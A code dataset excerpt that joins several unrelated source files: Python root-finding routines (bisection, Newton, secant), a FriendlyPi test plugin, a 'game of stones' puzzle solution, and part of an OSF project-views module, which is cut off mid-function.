err=abs(b-a)
if (fa*fxstar<0): #test to see if root is in [fa,fxstar]
b=xstar #if yes, set our upper bound to now be xstar
fb=fxstar #update the guess and iterate
elif (fb*fxstar<0): #test to see if root is in [fxstar,fb]
a=xstar #if yes, set our lower bound to now be xstar
fa=fxstar #update the guess and iterate
else:
a=xstar
b=xstar
print "Check the results carefully! One of your endpoints may be a root or 0 might be a root."
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level
break #if it is, we're done here
xstar_b=xstar
fxstar_b=f(xstar_b)
# perform Newton
x0=(a+b)/2 #need an initial guess, midpoint seems decent enough
fx0=f(x0) #define y-coord at x0 based on the given f
for i in range(niter):
dfx0=df(x0) #define derivative y-coord at x0 based on the given df
if (dfx0==0):
break
xstar=x0-fx0/dfx0 #set xstar as defined by Newton's method
err=abs(xstar-x0)
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
x0=xstar #update the initial guess and iterate
fx0=fxstar
if (i==niter):
break
xstar_n=xstar
fxstar_n=f(xstar_n)
# perform Secant
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
for i in range(niter):
if (fb==fa):
break
xstar=b-((fb*(b-a))/(fb-fa)) #set xstar as defined by secant method
err=abs(f(xstar))
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
a=b #update the initial guess and iterate
b=xstar #update the initial guess and iterate
fa=fb
fb=fxstar
if (i==niter) or (fb==fa):
break
xstar_s=xstar
fxstar_s=f(xstar_s)
#find best estimate for root by testing proximity to zero
if (abs(fxstar_b-0)<=abs(fxstar_n-0)):
if (abs(fxstar_b-0)==abs(fxstar_n-0)):
xstar=xstar_b
print "Bisect method and Newton method came to the same conclusion."
else:
if (abs(fxstar_b-0)<=abs(fxstar_s-0)):
if (abs(fxstar_b-0)==abs(fxstar_s-0)):
xstar=xstar_b
print "Bisect method and Secant method came to the same conclusion."
else:
xstar=xstar_b
print "Bisect method is superior."
else:
xstar=xstar_s
print "Secant method is superior."
else:
if (abs(fxstar_n-0)<=abs(fxstar_s-0)):
if (abs(fxstar_n-0)==abs(fxstar_s-0)):
xstar=xstar_n
print "Newton method and Secant method came to the same conclusion."
else:
xstar=xstar_n
print "Newton method is superior."
else:
xstar=xstar_s
print "Secant method is superior."
#plot function with identified root
#x=np.linspace(a, b, 200)
#plt.plot(x, f(x))
#plt.xlim(a-1, b+1)
#plt.xticks(np.linspace(a, b, 10, endpoint=True))
#plt.xlim(x.min()*1.1,x.max() * 1.1)
#plt.ylim(-5, 5)
#ax = plt.gca()
#ax.axes.get_yaxis().set_visible(False)
#ax.spines['right'].set_color('none')
#ax.spines['top'].set_color('none')
#ax.spines['left'].set_color('none')
#ax.xaxis.set_ticks_position('bottom')
# ax.spines['bottom'].set_position(('data',0))
#plt.show()
print "output = (value, bisect, newton, secant)"
return xstar, xstar_b, xstar_n, xstar_s
def bisect(f,a,b,niter,epsilon):
# Input
# f: the function that we need to find roots for
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
xseq=np.zeros(niter)
if (fa*fb>0): #test to see if there is a single root in the bracket
print "There are either no roots in this bracket, or an even number of them. Please refine your bracket."
return 1
for i in range(niter):
xstar=(a+b)/2 #define xstar as the midpoint of the current bracket
xseq[i]=xstar #add the value of xstar to this convergent sequence
fxstar=f(xstar) #set the value of our function at this new midpoint
err=abs(b-a)
if (fa*fxstar<0): #test to see if root is in [fa,fxstar]
b=xstar #if yes, set our upper bound to now be xstar
fb=fxstar #update the guess and iterate
elif (fb*fxstar<0): #test to see if root is in [fxstar,fb]
a=xstar #if yes, set our lower bound to now be xstar
fa=fxstar #update the guess and iterate
else:
a=xstar
b=xstar
print "Check the results carefully! One of your endpoints may be a root."
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level
break #if it is, we're done here
xstar=(a+b)/2
fxstar=f(xstar)
return xstar, err, fxstar, i+1, xseq[0:i]
def newton(f,df,x0,niter,epsilon):
# Input
# f: the function that we need to find roots for
# df: the derivative of the function f
# x0: initial guess for a root
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fx0=f(x0) #define y-coord at x0 based on the given f
xseq=np.zeros(niter+1) #need +1 as we already know the first entry is x0
xseq[0]=x0
for i in range(niter):
dfx0=df(x0) #define derivative y-coord at x0 based on the given df
xstar=x0-fx0/dfx0 #set xstar as defined by Newton's method
xseq[i+1]=xstar
err=abs(xstar-x0)
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
x0=xstar #update the initial guess and iterate
fx0=fxstar
if (i==niter):
print "Newton's method failed to converge given the number of iterations."
break
return xstar, err, fxstar, i+1, xseq[0:(i+2)]
def secant(f,a,b,niter,epsilon):
# Input
# f: the function of interest
# a: initial left bracket x-coord
# b: initial right bracket x-coord
# niter: max number of iterations
# epsilon: tolerance for the stopping rule
#
# Output
# xstar: the root of f for given tolerance epsilon
# err: error at convergence
# fxstar: the value of f at xstar (should be very close to zero as we are expecting a root)
# i: the number of iterations taken to get to the tolerance
# xseq: the values of {x_n} to see convergence
fa=f(a) #define y-coord at a based on the given f
fb=f(b) #define y-coord at b based on the given f
xseq=np.zeros(niter+1) #need +1 as we already know the first entry is x0
xseq[0]=a
xseq[1]=b
for i in range(niter):
xstar=b-((fb*(b-a))/(fb-fa)) #set xstar as defined by secant method
xseq[i+2]=xstar #+2 as we alreqady defined the first 2
err=abs(f(xstar))
fxstar=f(xstar)
if (err<epsilon): #test to see if our proposed root is "close enough" based on our tolerance level to the error
break
a=b #update the initial guess and iterate
b=xstar #update the initial guess and iterate
fa=fb
fb=fxstar
if (i==niter):
print "Secant's method failed to converge given the number of iterations."
break
return xstar, err, fxstar, i+1, xseq[0:(i+2)]
| gpl-2.0 | 3,397,281,621,320,606,700 | 40.15678 | 121 | 0.607536 | false |
happyemi/friendlypi | serverpi/src/plugins/test.py | 1 | 1122 | # Copyright 2013-2014 Emiliano Mennucci
#
# This file is part of FriendlyPi.
#
# FriendlyPi is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FriendlyPi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with FriendlyPi. If not, see <http://www.gnu.org/licenses/>.
class TestMod:
def __init__(self, config):
self.value = 0
def get_status(self):
actions = [{"id": "inc", "label": "Increment"}, {"id": "dec", "label": "Decrement"}]
return {"caption": "Test module", "status": str(self.value), "actions": actions }
def exec_command(self, command):
if command == "inc":
self.value += 1
else:
self.value -= 1;
| gpl-3.0 | -7,523,172,867,304,118,000 | 35.193548 | 86 | 0.675579 | false |
FranzSchubert92/cw | python/game_of_stones.py | 1 | 2265 | """
Two players (numbered 1 and 2) are playing a game with n stones. Player 1
always plays first, and the two players move in alternating turns. The game's
rules are as follows:
In a single move, a player can remove 2, 3, or 5 stones from the game board.
If a player is unable to make a move, that player loses the game.
Given the number of stones, find and print the name of the winner on a new line.
Each player plays optimally, meaning they will not make a move that causes them
to lose the game if some better, winning move exists.
Input Format
The first line contains an integer, T, denoting the number of test cases.
Each of the subsequent lines contains a single integer n denoting the number
of stones in a test case.
Output Format
On a new line for each test case, print 'First' if the first player wins;
otherwise, print 'Second'.
# doctests
>>> play(1)
'Second'
>>> play(2)
'First'
>>> play(3)
'First'
>>> play(4)
'First'
>>> play(5)
'First'
>>> play(6)
'First'
>>> play(7)
'Second'
>>> play(8)
'Second'
>>> play(10)
'First'
Explanation
In the sample, we have 8 testcases.
We'll refer to our two players as and .
If , can't make any moves and loses the game (i.e., the wins and we print on
a new line).
If , removes stones in their first move and wins the game, so we print on a
new line.
If , removes stones in their first move, leaving stone on the board. Because
is left with no available moves, wins and we print on a new line.
If , removes stones in their first move, leaving stone on the board. Because
has no available moves,
"""
def play(stones):
# "moves" is a map from number of stones to whether player1 will win;
# player1 always goes first;
moves = {0:False, 1:False, 2:True, 3:True, 4:True, 5:True, 6:True, 7:False}
x = max(moves.keys())
while x < stones:
x += 1
if moves[x-2] == moves[x-3] == moves[x-5]:
moves[x] = not moves[x-2]
elif not moves[x-5] or not moves[x-3] or not moves[x-2]:
moves[x] = True
return "First" if moves[stones] else "Second"
if __name__ == "__main__":
import doctest
doctest.testmod()
T = int(input())
while T:
num_stones = int(input())
print(play(num_stones))
T -= 1
| bsd-3-clause | 7,715,425,145,268,505,000 | 24.166667 | 81 | 0.664459 | false |
adlius/osf.io | website/project/views/node.py | 1 | 51221 | # -*- coding: utf-8 -*-
import os
import logging
from rest_framework import status as http_status
import math
from collections import defaultdict
from flask import request
from django.apps import apps
from django.utils import timezone
from django.core.exceptions import ValidationError
from django.db.models import Q, OuterRef, Subquery
from framework import status
from framework.utils import iso8601format
from framework.flask import redirect # VOL-aware redirect
from framework.auth.decorators import must_be_logged_in, collect_auth
from website.ember_osf_web.decorators import ember_flag_is_active
from api.waffle.utils import flag_is_active, storage_i18n_flag_active, storage_usage_flag_active
from framework.exceptions import HTTPError
from osf.models.nodelog import NodeLog
from osf.utils.functional import rapply
from osf.utils.registrations import strip_registered_meta_comments
from osf.utils import sanitize
from osf import features
from website import language
from website.util import rubeus
from website.ember_osf_web.views import use_ember_app
from osf.exceptions import NodeStateError
from website.project import new_node, new_private_link
from website.project.decorators import (
must_be_contributor_or_public_but_not_anonymized,
must_be_contributor_or_public,
must_be_valid_project,
must_have_permission,
must_not_be_registration,
must_not_be_retracted_registration,
)
from osf.utils.tokens import process_token_or_pass
from website.util.rubeus import collect_addon_js
from website.project.model import has_anonymous_link, NodeUpdateError, validate_title
from website.project.forms import NewNodeForm
from website.project.utils import sizeof_fmt
from website.project.metadata.utils import serialize_meta_schemas
from addons.wiki.models import WikiPage
from osf.models import AbstractNode, Collection, Contributor, Guid, PrivateLink, Node, NodeRelation, Preprint
from osf.models.licenses import serialize_node_license_record
from osf.utils.sanitize import strip_html
from osf.utils.permissions import ADMIN, READ, WRITE, CREATOR_PERMISSIONS, ADMIN_NODE
from website import settings
from website.views import find_bookmark_collection, validate_page_num
from website.views import serialize_node_summary, get_storage_region_list
from website.profile import utils
from addons.mendeley.provider import MendeleyCitationsProvider
from addons.zotero.provider import ZoteroCitationsProvider
from addons.wiki.utils import serialize_wiki_widget
from addons.wiki.models import WikiVersion
from addons.dataverse.utils import serialize_dataverse_widget
from addons.forward.utils import serialize_forward_widget
r_strip_html = lambda collection: rapply(collection, strip_html)
logger = logging.getLogger(__name__)
@must_be_valid_project
@must_have_permission(WRITE)
def edit_node(auth, node, **kwargs):
post_data = request.json
edited_field = post_data.get('name')
value = post_data.get('value', '')
new_val = None
if edited_field == 'title':
try:
node.set_title(value, auth=auth)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
new_val = node.title
elif edited_field == 'description':
node.set_description(value, auth=auth)
new_val = node.description
elif edited_field == 'category':
node.category = new_val = value
try:
node.save()
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
return {
'status': 'success',
'newValue': new_val # Used by x-editable widget to reflect changes made by sanitizer
}
##############################################################################
# New Project
##############################################################################
@must_be_logged_in
def project_new(**kwargs):
return {}
@must_be_logged_in
def project_new_post(auth, **kwargs):
user = auth.user
data = request.get_json()
title = strip_html(data.get('title'))
title = title.strip()
category = data.get('category', 'project')
template = data.get('template')
description = strip_html(data.get('description'))
campaign = data.get('campaign', None)
new_project = {}
if template:
original_node = AbstractNode.load(template)
changes = {
'title': title,
'category': category,
'template_node': original_node,
}
if description:
changes['description'] = description
project = original_node.use_as_template(
auth=auth,
changes={
template: changes,
}
)
else:
try:
project = new_node(category, title, user, description, campaign=campaign)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
new_project = _view_project(project, auth)
return {
'projectUrl': project.url,
'newNode': new_project['node'] if new_project else None
}, http_status.HTTP_201_CREATED
@must_be_logged_in
@must_be_valid_project
def project_new_from_template(auth, node, **kwargs):
new_node = node.use_as_template(
auth=auth,
changes=dict(),
)
return {'url': new_node.url}, http_status.HTTP_201_CREATED, None
##############################################################################
# New Node
##############################################################################
@must_be_valid_project
@must_have_permission(WRITE)
@must_not_be_registration
def project_new_node(auth, node, **kwargs):
"""
There's an APIv2 endpoint that does this same thing!
If you make changes here, see if they need to be made there.
"""
form = NewNodeForm(request.form)
user = auth.user
if form.validate():
try:
new_component = new_node(
title=strip_html(form.title.data),
user=user,
category=form.category.data,
parent=node,
)
except ValidationError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data=dict(message_long=str(e))
)
redirect_url = node.url
message = (
'Your component was created successfully. You can keep working on the project page below, '
'or go to the new <u><a href={component_url}>component</a></u>.'
).format(component_url=new_component.url)
if form.inherit_contributors.data and node.has_permission(user, WRITE):
for contributor in node.contributors:
# Using permission property off of Contributor model to get contributor permissions - not group member perms
perm = CREATOR_PERMISSIONS if contributor._id == user._id else Contributor.objects.get(user_id=contributor.id, node_id=node.id).permission
if contributor._id == user._id and not contributor.is_registered:
new_component.add_unregistered_contributor(
fullname=contributor.fullname, email=contributor.email,
permissions=perm, auth=auth, existing_user=contributor
)
else:
new_component.add_contributor(contributor, permissions=perm, auth=auth)
for group in node.osf_groups:
if group.is_manager(user):
new_component.add_osf_group(group, group.get_permission_to_node(node), auth=auth)
new_component.save()
redirect_url = new_component.url + 'contributors/'
message = (
'Your component was created successfully. You can edit the contributor permissions below, '
'work on your <u><a href={component_url}>component</a></u> or return to the <u> '
'<a href="{project_url}">project page</a></u>.'
).format(component_url=new_component.url, project_url=node.url)
status.push_status_message(message, kind='info', trust=True)
return {
'status': 'success',
}, 201, None, redirect_url
else:
# TODO: This function doesn't seem to exist anymore?
status.push_errors_to_status(form.errors)
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, redirect_url=node.url)
@must_be_logged_in
@must_be_valid_project
def project_before_fork(auth, node, **kwargs):
user = auth.user
prompts = node.callback('before_fork', user=user)
if node.has_pointers_recursive:
prompts.append(
language.BEFORE_FORK_HAS_POINTERS.format(
category=node.project_or_component
)
)
return {'prompts': prompts}
@must_be_logged_in
@must_be_valid_project
def project_before_template(auth, node, **kwargs):
prompts = []
for addon in node.get_addons():
if 'node' in addon.config.configs:
if addon.to_json(auth.user)['addon_full_name']:
prompts.append(addon.to_json(auth.user)['addon_full_name'])
return {'prompts': prompts, 'isRegistration': node.is_registration}
@must_be_valid_project
@must_be_contributor_or_public_but_not_anonymized
@must_not_be_registration
def node_registrations(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/{}/registrations/'.format(node._id))
return use_ember_app()
@must_be_valid_project
@must_be_contributor_or_public_but_not_anonymized
@must_not_be_retracted_registration
def node_forks(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/' + node._id + '/forks/')
return use_ember_app()
@must_be_valid_project
@must_not_be_retracted_registration
@must_be_logged_in
@must_have_permission(READ)
@ember_flag_is_active(features.EMBER_PROJECT_SETTINGS)
def node_setting(auth, node, **kwargs):
if node.is_registration and flag_is_active(request, features.EMBER_REGISTRIES_DETAIL_PAGE):
# Registration settings page obviated during redesign
return redirect(node.url)
auth.user.update_affiliated_institutions_by_email_domain()
auth.user.save()
ret = _view_project(node, auth, primary=True)
ret['include_wiki_settings'] = WikiPage.objects.include_wiki_settings(node)
ret['wiki_enabled'] = 'wiki' in node.get_addon_names()
ret['comments'] = {
'level': node.comment_level,
}
addon_settings = {}
for addon in ['forward']:
addon_config = apps.get_app_config('addons_{}'.format(addon))
config = addon_config.to_json()
config['template_lookup'] = addon_config.template_lookup
config['addon_icon_url'] = addon_config.icon_url
config['node_settings_template'] = os.path.basename(addon_config.node_settings_template)
addon_settings[addon] = config
ret['addon_settings'] = addon_settings
ret['categories'] = settings.NODE_CATEGORY_MAP
ret['categories'].update({
'project': 'Project'
})
return ret
@must_be_valid_project
@must_not_be_registration
@must_be_logged_in
@must_have_permission(WRITE)
def node_addons(auth, node, **kwargs):
ret = _view_project(node, auth, primary=True)
addon_settings = serialize_addons(node, auth)
ret['addon_capabilities'] = settings.ADDON_CAPABILITIES
# If an addon is default you cannot connect/disconnect so we don't have to load it.
ret['addon_settings'] = [addon for addon in addon_settings]
# Addons can have multiple categories, but we only want a set of unique ones being used.
ret['addon_categories'] = set([item for addon in addon_settings for item in addon['categories']])
# The page only needs to load enabled addons and it refreshes when a new addon is being enabled.
ret['addon_js'] = collect_node_config_js([addon for addon in addon_settings if addon['enabled']])
return ret
def serialize_addons(node, auth):
addon_settings = []
addons_available = [addon for addon in settings.ADDONS_AVAILABLE
if addon not in settings.SYSTEM_ADDED_ADDONS['node']
and addon.short_name not in ('wiki', 'forward', 'twofactor')]
for addon in addons_available:
addon_config = apps.get_app_config('addons_{}'.format(addon.short_name))
config = addon_config.to_json()
config['template_lookup'] = addon_config.template_lookup
config['addon_icon_url'] = addon_config.icon_url
config['node_settings_template'] = os.path.basename(addon_config.node_settings_template)
config['addon_short_name'] = addon.short_name
config['addon_full_name'] = addon.full_name
config['categories'] = addon.categories
config['enabled'] = node.has_addon(addon.short_name)
config['default'] = addon.short_name in settings.ADDONS_DEFAULT
if node.has_addon(addon.short_name):
node_json = node.get_addon(addon.short_name).to_json(auth.user)
config.update(node_json)
addon_settings.append(config)
addon_settings = sorted(addon_settings, key=lambda addon: addon['full_name'].lower())
return addon_settings
def collect_node_config_js(addons):
"""Collect webpack bundles for each of the addons' node-cfg.js modules. Return
the URLs for each of the JS modules to be included on the node addons config page.
:param list addons: List of node's addon config records.
"""
js_modules = []
for addon in addons:
source_path = os.path.join(
settings.ADDON_PATH,
addon['short_name'],
'static',
'node-cfg.js',
)
if os.path.exists(source_path):
asset_path = os.path.join(
'/',
'static',
'public',
'js',
addon['short_name'],
'node-cfg.js',
)
js_modules.append(asset_path)
return js_modules
@must_have_permission(WRITE)
@must_not_be_registration
def node_choose_addons(auth, node, **kwargs):
node.config_addons(request.json, auth)
@must_be_valid_project
@must_not_be_retracted_registration
@must_have_permission(READ)
@ember_flag_is_active(features.EMBER_PROJECT_CONTRIBUTORS)
def node_contributors(auth, node, **kwargs):
ret = _view_project(node, auth, primary=True)
ret['contributors'] = utils.serialize_contributors(node.contributors, node)
ret['access_requests'] = utils.serialize_access_requests(node)
ret['adminContributors'] = utils.serialize_contributors(node.parent_admin_contributors, node, admin=True)
return ret
@must_have_permission(ADMIN)
def configure_comments(node, **kwargs):
comment_level = request.json.get('commentLevel')
if not comment_level:
node.comment_level = None
elif comment_level in ['public', 'private']:
node.comment_level = comment_level
else:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
node.save()
@must_have_permission(ADMIN)
@must_not_be_registration
def configure_requests(node, **kwargs):
access_requests_enabled = request.get_json().get('accessRequestsEnabled')
auth = kwargs.get('auth', None)
node.set_access_requests_enabled(access_requests_enabled, auth, save=True)
return {'access_requests_enabled': access_requests_enabled}, 200
##############################################################################
# View Project
##############################################################################
@process_token_or_pass
@must_be_valid_project(retractions_valid=True)
@must_be_contributor_or_public
@ember_flag_is_active(features.EMBER_PROJECT_DETAIL)
def view_project(auth, node, **kwargs):
primary = '/api/v1' not in request.path
ret = _view_project(node, auth,
primary=primary,
embed_contributors=True,
embed_descendants=True
)
ret['addon_capabilities'] = settings.ADDON_CAPABILITIES
# Collect the URIs to the static assets for addons that have widgets
ret['addon_widget_js'] = list(collect_addon_js(
node,
filename='widget-cfg.js',
config_entry='widget'
))
ret.update(rubeus.collect_addon_assets(node))
access_request = node.requests.filter(creator=auth.user).exclude(machine_state='accepted')
ret['user']['access_request_state'] = access_request.get().machine_state if access_request else None
addons_widget_data = {
'wiki': None,
'mendeley': None,
'zotero': None,
'forward': None,
'dataverse': None
}
if 'wiki' in ret['addons']:
addons_widget_data['wiki'] = serialize_wiki_widget(node)
if 'dataverse' in ret['addons']:
addons_widget_data['dataverse'] = serialize_dataverse_widget(node)
if 'forward' in ret['addons']:
addons_widget_data['forward'] = serialize_forward_widget(node)
if 'zotero' in ret['addons']:
node_addon = node.get_addon('zotero')
zotero_widget_data = ZoteroCitationsProvider().widget(node_addon)
addons_widget_data['zotero'] = zotero_widget_data
if 'mendeley' in ret['addons']:
node_addon = node.get_addon('mendeley')
mendeley_widget_data = MendeleyCitationsProvider().widget(node_addon)
addons_widget_data['mendeley'] = mendeley_widget_data
ret.update({'addons_widget_data': addons_widget_data})
return ret
@process_token_or_pass
@must_be_valid_project(retractions_valid=True)
@must_be_contributor_or_public
def token_action(auth, node, **kwargs):
return redirect(node.url)
# Reorder components
@must_be_valid_project
@must_not_be_registration
@must_have_permission(WRITE)
def project_reorder_components(node, **kwargs):
"""Reorders the components in a project's component list.
:param-json list new_list: List of strings that include node GUIDs.
"""
ordered_guids = request.get_json().get('new_list', [])
node_relations = (
node.node_relations
.select_related('child')
.filter(child__is_deleted=False)
)
deleted_node_relation_ids = list(
node.node_relations.select_related('child')
.filter(child__is_deleted=True)
.values_list('pk', flat=True)
)
if len(ordered_guids) > len(node_relations):
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data=dict(message_long='Too many node IDs'))
# Ordered NodeRelation pks, sorted according the order of guids passed in the request payload
new_node_relation_ids = [
each.id for each in sorted(node_relations,
key=lambda nr: ordered_guids.index(nr.child._id))
]
if len(node_relations) == len(ordered_guids):
node.set_noderelation_order(new_node_relation_ids + deleted_node_relation_ids)
node.save()
return {'nodes': ordered_guids}
logger.error('Got invalid node list in reorder components')
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
@must_be_valid_project
@must_be_contributor_or_public
@must_not_be_retracted_registration
def project_statistics(auth, node, **kwargs):
if request.path.startswith('/project/'):
return redirect('/' + node._id + '/analytics/')
return use_ember_app()
###############################################################################
# Make Private/Public
###############################################################################
@must_be_valid_project
@must_have_permission(ADMIN)
def project_set_privacy(auth, node, **kwargs):
permissions = kwargs.get('permissions')
if permissions is None:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
try:
node.set_privacy(permissions, auth)
except NodeStateError as e:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data=dict(
message_short="Can't change privacy",
message_long=str(e)
))
return {
'status': 'success',
'permissions': permissions,
}
@must_be_valid_project
@must_have_permission(WRITE)
def update_node(auth, node, **kwargs):
# in node.update() method there is a key list node.WRITABLE_WHITELIST only allow user to modify
# category, title, and description which can be edited by write permission contributor
data = r_strip_html(request.get_json())
try:
updated_field_names = node.update(data, auth=auth)
except NodeUpdateError as e:
raise HTTPError(400, data=dict(
message_short="Failed to update attribute '{0}'".format(e.key),
message_long=e.reason
))
# Need to cast tags to a string to make them JSON-serialiable
updated_fields_dict = {
key: getattr(node, key) if key != 'tags' else [str(tag) for tag in node.tags]
for key in updated_field_names
if key != 'logs' and key != 'modified' and key != 'last_logged'
}
return {'updated_fields': updated_fields_dict}
@must_be_valid_project
@must_have_permission(ADMIN)
@must_not_be_registration
def component_remove(auth, node, **kwargs):
"""Remove component, and recursively remove its children. If node has a
parent, add log and redirect to parent; else redirect to user dashboard.
"""
try:
node.remove_node(auth)
except NodeStateError as e:
raise HTTPError(
http_status.HTTP_400_BAD_REQUEST,
data={
'message_short': 'Error',
'message_long': 'Could not delete component: ' + str(e)
},
)
message = '{} has been successfully deleted.'.format(
node.project_or_component.capitalize()
)
id = '{}_deleted'.format(node.project_or_component)
status.push_status_message(message, kind='success', trust=False, id=id)
parent = node.parent_node
if parent and parent.can_view(auth):
redirect_url = node.parent_node.url
else:
redirect_url = '/dashboard/'
return {
'url': redirect_url,
}
@must_be_valid_project
@must_have_permission(ADMIN)
def remove_private_link(*args, **kwargs):
link_id = request.json['private_link_id']
try:
link = PrivateLink.objects.get(_id=link_id)
except PrivateLink.DoesNotExist:
raise HTTPError(http_status.HTTP_404_NOT_FOUND)
link.is_deleted = True
link.deleted = timezone.now()
link.save()
for node in link.nodes.all():
log_dict = {
'project': node.parent_id,
'node': node._id,
'user': kwargs.get('auth').user._id,
'anonymous_link': link.anonymous,
}
node.add_log(
NodeLog.VIEW_ONLY_LINK_REMOVED,
log_dict,
auth=kwargs.get('auth', None)
)
# TODO: Split into separate functions
def _render_addons(addons):
widgets = {}
configs = {}
js = []
css = []
for addon in addons:
configs[addon.config.short_name] = addon.config.to_json()
js.extend(addon.config.include_js.get('widget', []))
css.extend(addon.config.include_css.get('widget', []))
js.extend(addon.config.include_js.get('files', []))
css.extend(addon.config.include_css.get('files', []))
return widgets, configs, js, css
def _should_show_wiki_widget(node, user):
has_wiki = bool(node.get_addon('wiki'))
wiki_page = WikiVersion.objects.get_for_node(node, 'home')
if node.has_permission(user, WRITE) and not node.is_registration:
return has_wiki
else:
return has_wiki and wiki_page and wiki_page.html(node)
def _view_project(node, auth, primary=False,
embed_contributors=False, embed_descendants=False,
embed_registrations=False, embed_forks=False):
"""Build a JSON object containing everything needed to render
project.view.mako.
"""
node = AbstractNode.objects.filter(pk=node.pk).include('contributor__user__guids').get()
user = auth.user
parent = node.find_readable_antecedent(auth)
if user:
bookmark_collection = find_bookmark_collection(user)
bookmark_collection_id = bookmark_collection._id
in_bookmark_collection = bookmark_collection.guid_links.filter(_id=node._id).exists()
else:
in_bookmark_collection = False
bookmark_collection_id = ''
view_only_link = auth.private_key or request.args.get('view_only', '').strip('/')
anonymous = has_anonymous_link(node, auth)
addons = list(node.get_addons())
widgets, configs, js, css = _render_addons(addons)
redirect_url = node.url + '?view_only=None'
disapproval_link = ''
if (node.is_pending_registration and node.has_permission(user, ADMIN)):
disapproval_link = node.root.registration_approval.stashed_urls.get(user._id, {}).get('reject', '')
if (node.is_pending_embargo and node.has_permission(user, ADMIN)):
disapproval_link = node.root.embargo.stashed_urls.get(user._id, {}).get('reject', '')
# Before page load callback; skip if not primary call
if primary:
for addon in addons:
messages = addon.before_page_load(node, user) or []
for message in messages:
status.push_status_message(message, kind='info', dismissible=False, trust=True)
NodeRelation = apps.get_model('osf.NodeRelation')
is_registration = node.is_registration
data = {
'node': {
'disapproval_link': disapproval_link,
'id': node._primary_key,
'title': sanitize.unescape_entities(node.title),
'category': node.category_display,
'category_short': node.category,
'node_type': node.project_or_component,
'description': node.description or '',
'license': serialize_node_license_record(node.license),
'url': node.url,
'api_url': node.api_url,
'absolute_url': node.absolute_url,
'redirect_url': redirect_url,
'display_absolute_url': node.display_absolute_url,
'update_url': node.api_url_for('update_node'),
'in_dashboard': in_bookmark_collection,
'is_public': node.is_public,
'is_archiving': node.archiving,
'date_created': iso8601format(node.created),
'date_modified': iso8601format(node.last_logged) if node.last_logged else '',
'tags': list(node.tags.filter(system=False).values_list('name', flat=True)),
'children': node.nodes_active.exists(),
'child_exists': Node.objects.get_children(node, active=True).exists(),
'is_supplemental_project': node.has_linked_published_preprints,
'is_registration': is_registration,
'is_pending_registration': node.is_pending_registration if is_registration else False,
'is_retracted': node.is_retracted if is_registration else False,
'is_pending_retraction': node.is_pending_retraction if is_registration else False,
'retracted_justification': getattr(node.root.retraction, 'justification', None) if is_registration else None,
'date_retracted': iso8601format(getattr(node.root.retraction, 'date_retracted', None)) if is_registration else '',
'embargo_end_date': node.embargo_end_date.strftime('%A, %b %d, %Y') if is_registration and node.embargo_end_date else '',
'is_pending_embargo': node.is_pending_embargo if is_registration else False,
'is_embargoed': node.is_embargoed if is_registration else False,
'is_pending_embargo_termination': is_registration and node.is_pending_embargo_termination,
'registered_from_url': node.registered_from.url if is_registration else '',
'registered_date': iso8601format(node.registered_date) if is_registration else '',
'root_id': node.root._id if node.root else None,
'registered_meta': strip_registered_meta_comments(node.registered_meta),
'registered_schemas': serialize_meta_schemas(list(node.registered_schema.all())) if is_registration else False,
'is_fork': node.is_fork,
'is_collected': node.is_collected,
'collections': serialize_collections(node.collecting_metadata_list, auth),
'forked_from_id': node.forked_from._primary_key if node.is_fork else '',
'forked_from_display_absolute_url': node.forked_from.display_absolute_url if node.is_fork else '',
'forked_date': iso8601format(node.forked_date) if node.is_fork else '',
'fork_count': node.forks.exclude(type='osf.registration').filter(is_deleted=False).count(),
'private_links': [x.to_json() for x in node.private_links_active],
'link': view_only_link,
'templated_count': node.templated_list.count(),
'linked_nodes_count': NodeRelation.objects.filter(child=node, is_node_link=True).exclude(parent__type='osf.collection').count(),
'anonymous': anonymous,
'comment_level': node.comment_level,
'has_comments': node.comment_set.exists(),
'identifiers': {
'doi': node.get_identifier_value('doi'),
'ark': node.get_identifier_value('ark'),
},
'visible_preprints': serialize_preprints(node, user),
'institutions': get_affiliated_institutions(node) if node else [],
'has_draft_registrations': node.has_active_draft_registrations,
'access_requests_enabled': node.access_requests_enabled,
'storage_location': node.osfstorage_region.name,
'waterbutler_url': node.osfstorage_region.waterbutler_url,
'mfr_url': node.osfstorage_region.mfr_url,
'groups': list(node.osf_groups.values_list('name', flat=True)),
},
'parent_node': {
'exists': parent is not None,
'id': parent._primary_key if parent else '',
